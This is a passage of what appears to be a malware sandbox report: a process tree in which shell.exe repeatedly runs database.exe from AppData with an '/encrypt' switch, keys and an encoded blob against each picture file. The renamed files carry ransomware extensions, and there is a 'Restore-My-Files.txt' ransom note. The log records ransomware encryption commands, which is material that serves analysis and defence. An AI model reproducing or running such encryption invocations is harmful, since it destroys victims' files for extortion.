                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\PushSearch.svg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5316
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\README_sTlLoTpq.hta.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReadRegister.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:1844
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ReceiveConvertFrom.emz.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:5656
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RegisterBlock.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:3060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RenameSearch.emf.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RequestProtect.svg.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\ResolveCopy.jpg.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6512
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\RestartHide.raw.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:1716
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\Restore-My-Files.txt"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:5060
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUnblock.tif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:4044
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUninstall.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:2408
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SelectUpdate.cr2.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\SplitSubmit.dib.id-DA208E5B.[[email protected]].gamma.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:6668
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StartRevoke.bmp.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:916
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StepSend.wmf.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:6952
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\shell.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            "C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Roaming\database.exe" "/encrypt" "2E9FC2AF4D0373EDE116E58672CBC4BF071EBC00333930EF290C186F55DF5E10B" "2784A28C87461220A6AA172075A037487D165E2ACD27B6BFB17C694D900C769F7" "+4IAAAAAAADkbriJHZLXEYRQDAN=0dJDzsql7tb7srCQhC+a+qXTjhoR17ptZ7ZZ9+qhXVNTpUlo1Ur=n=9RXn2bRPO+++3Pqy1OUZtvPib2YorZV2O1+21bVXM7xx41jwjqeo5MZHT3wdxV+lOpsZtRI+GmfV6vwDLnEWtmXWFtbaqSTNuu6xBFVa3Re4bZrevjlSeIKZydjCe9J42jR8VbLwtf+Qwm1Yzo1foYF2+yG0MALZXOyvqOqSENsqi1d52=hNWRqCLv89+1tCR0MNNVjExbnkL0BwT84DIGsko6VGuQ8EXSDsQyoELPLFEGOSQ+gvqgSezEU9kBotAmIllHlBa2WsNyYyfpL4wAIdfV=BIAfjNUXGMXxYnNlO8DC10F8o0GEpJBpdDC8gRr8ixOPqJAwVjinTrt7D4RXYnHbBLxykA" "C:\Users\Admin\Pictures\StopNew.gif.sage.gif"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:5160
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\shell.exe
